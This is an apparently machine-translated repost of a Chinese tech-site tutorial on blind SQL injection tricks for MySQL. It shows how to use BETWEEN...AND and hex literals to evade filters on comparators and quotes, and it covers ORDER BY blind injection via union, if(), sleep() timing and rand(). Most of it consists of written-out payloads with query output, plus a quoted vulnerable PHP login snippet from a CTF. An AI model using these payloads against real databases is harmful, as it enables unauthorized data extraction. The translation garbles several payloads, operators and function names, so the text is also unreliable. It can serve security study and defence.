Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to achieve SQL injection Trick. The article is rich in content and analyzes and describes for you from a professional point of view. I hope you can get something after reading this article.

The between and operator replaces the comparator

Operator BETWEEN... AND selects a range of data between two values. These values can be numeric, text, or date.

Between and has data comparison function.

Exp1 between min and max

If the result of exp1 is between min and max, `between and` returns `1`, otherwise it returns `0`.

Example

Mysql > select * from user +-- +-+ | id | username | password | email | +-+ -+-+ | 1 | a | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | | 2 | aa | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | 3 | admin | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com | 4 | add | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | +-+-- -+-+ mysql > select * from user where id between 1 and 2 +-- +-+ | id | username | password | email | +-+ -+-+ | 1 | a | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | | 2 | aa | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | +-+-

Most databases support between and operations, but the treatment of boundaries is different. In mysql, between and contains boundaries, which in mathematics is [min,max].

Application in blind injection

Between and can be used to filter =, like, regexp, >, select database (); +-+ | database () | +-+ | test | +-+ 1 row in set (0.00 sec)

1. Used in conjunction with the interception function

Mysql > select mid (database (), 1) between'a 'and 'a' +-- + | mid (database () 1 between 1) between'a 'and'a' | +-+ | 0 | +-+ 1 row in set (0.00 sec) mysql > select mid (database (), 1) between 't'and 't' +-- + | mid (database () 1) between 't'and 't' | +-+ | 1 | +-+ 1 row in set (0.00 sec)

two。 The intercept function is filtered

Expression.

Select exp between min and max

The way you set min and max changes when the intercept function is filtered.

Test 1

Mysql > select 'b'between 'a'and 'cThe and + | 'b'between 'a'and 'c' | +-+ | 1 | +-+ 1 row in set (0.00 sec) mysql > select 'b'between 'a'and 'b' +-+ |'b' between'a 'and' b' | +-+ | 1 | +-+ 1 row in set (0.00 sec) mysql > select'b' between'b' and 'c' +-+ |'b' between'b' and'c' | +-+ | 1 | +-+ 1 row in set (0.00 sec)

Test 2

Mysql > select 'bcd' between'a' and 'c' +-- + | 'bcd' between' a 'and'c' | +-+ | 1 | +-+ 1 row in set (0.00 sec) mysql > select 'bcd' between' a 'and' b' +-- + | 'bcd' between' a 'and 'b' | +-+ | 0 | +-+ 1 row in set (0.00 sec) mysql > select' bcd' between'b' and'c' +-- + | 'bcd' between' b' and'c' | +-+ | 1 | +-+ 1 row in set (0.00 sec)

From the test, when exp is a single character, the return values of the three intervals are all 1, but when exp is a string, when the interval is Amurb, the return value is 0. 0. When the interval is aMuc or bMuc, the return value is 1.

That is, when comparing strings, only one side of the value is included, that is, [bPermec].

Therefore, in the actual use, we should pay attention to the scope of the range.

Actual test

Mysql > select database () between 'a'and 'z' +-- + | database () between'a 'and 'z' | +-+ | 1 | +-+ 1 row in set (0. 05 sec).. MySQL > select database () between 't'and 'z' +-+ | database () between 't'and 'z' | +-+ | 1 | +-+ 1 row in set (0. 00 sec) mysql > select database () between 'u'and 'z' +-- + | database () between'u 'and 'z' | +-+ | 0 | +-+ 1 row in set (0.00 sec)

As can be seen from the result, the first character is t

Second character

Mysql > select database () between 'tatest+--+test | database () between' ta' and 'tz' | test+--+ | 1 | +-- -+ 1 row in set (0.00 sec) mysql > select database () between 'te' and' tz' +-+ | database () between 'te' and' tz' | +-+ | 1 | +- + 1 row in set (0.00 sec) mysql > select database () between 'tf' and' tz' +-- + | database () between 'tf' and' tz' | +-+ | 0 | +-+ 1 row in set (0.00 sec)

The rest and so on. Finally, it is test.

3. Single quotation marks are filtered

Between and also supports hexadecimal, so hexadecimal can be used to bypass single quotation mark filtering.

test

Mysql > select database () between 0x61 and 0x7a; / / select database () between 'a'and 'z' +-+ | database () between 0x61 and 0x7a | +-+ | 1 | +-+ 1 row in set (0.00 sec) mysql > select database () between 0x74 and 0x7a / / select database () between 't'and 'z' +-+ | database () between 0x74 and 0x7a | +-+ | 1 | +-+ 1 row in set (0.00 sec) mysql > select database () between 0x75 and 0x7a / / select database () between'u 'and'z' +-- + | database () between 0x75 and 0x7a | +-- + | 0 | +-+ 1 row in set (0.00 sec)

Learn about order by

Order by is a method of sorting query data in mysql.

Use the example

Select * from table name order by column name (or number) asc; ascending (default ascending order) select * from table name order by column name (or number) desc; descending order

The point here is that you can fill in either a column name or a number after order by. For example:

Id is the column name of the first column of the user table, so if you want to sort by id, you can write it in two ways:

Select * from user order by id;selecr * from user order by 1

Order by blind injection

Blind injection combined with union

I saw this at the monthly match of the Anheng Cup.

Background key code

$sql = 'select * from admin where username=' ". $username."'; $result = mysql_query ($sql); $row = mysql_fetch_array ($result); if (isset ($row) & & row ['username']! = "admin") {$hit= "username error!";} else {if ($row [' password'] = $password) {$hit= ";} else {$hit=" password error! ";}}

Payload

Username=admin' union 1pr 2 username=admin' union 'string' order by 3

The sql statement becomes

Select * from admin where username='admin' or 1 union select 1 union select 2 dint binary 'string' order by 3

Here we will compare the third column, that is, the string and the password. Then you can make a blind note according to the different situations returned by the page.

Note that it is best to add binary, because order by is not case-sensitive when comparing.

Blind injection based on if ()

Need to know the column name

If the columns of order by are different, the pages returned will of course be different, so you can blindly note them according to the columns you sort.

Example:

Order by if (1century 1century ID username)

It is not possible to use numbers instead of column names here, because the if statement returns a character type, not an integer.

You don't need to know the column name

Payload

Order by if (expression, 1, (select id from information_schema.tables))

If the expression is false, the sql statement will report an error of ERROR 1242 (21000): Subquery returns more than 1 row, resulting in empty query content, and if the expression is true, the normal page will be returned.

Time-based blind injection

Payload

Order by if (1pm 1pm 1pm sleep (1))

Test result

Select * from ha order by if (1pm 1pm 1pm sleep (1); # normal time

Select * from ha order by if (1pm 2pm 1pm sleep (1)); # with delay

During the test, it was found that the delay was not 1 second in sleep (1), but more than 1 second.

Finally, it is found that there is a multiple relationship between the delay time and the number of data queried.

Calculation formula:

Delay time = seconds of sleep (1) * number of data items queried

The ha table I tested had five pieces of data, so it was delayed by five seconds. If you query a lot of data, the delay will be very long.

When writing a script, you can add the parameter timeout to avoid a long delay.

Blind injection based on rang ()

I won't repeat the principle, just look at the test results.

Mysql > select * from ha order by rand (true); +-+-+ | id | name | +-+-+ | 9 | NULL | | 6 | NULL | | 5 | NULL | | 1 | dss | 0 | dasd | +-+ mysql > select * from ha order by rand (false) +-+ | id | name | +-+-+ | 1 | dss | | 6 | NULL | | 0 | dasd | | 5 | NULL | | 9 | NULL | +-+-- +

You can see that when rang () is true and false, the sort results are different, so you can use the rang () function to make blind bets.

Example

Order by rand (ascii (mid ((select database (), 1Pol 1)) > 96) the above is what the editor shares with you on how to implement SQL injection into Trick. If you happen to have similar doubts, please refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.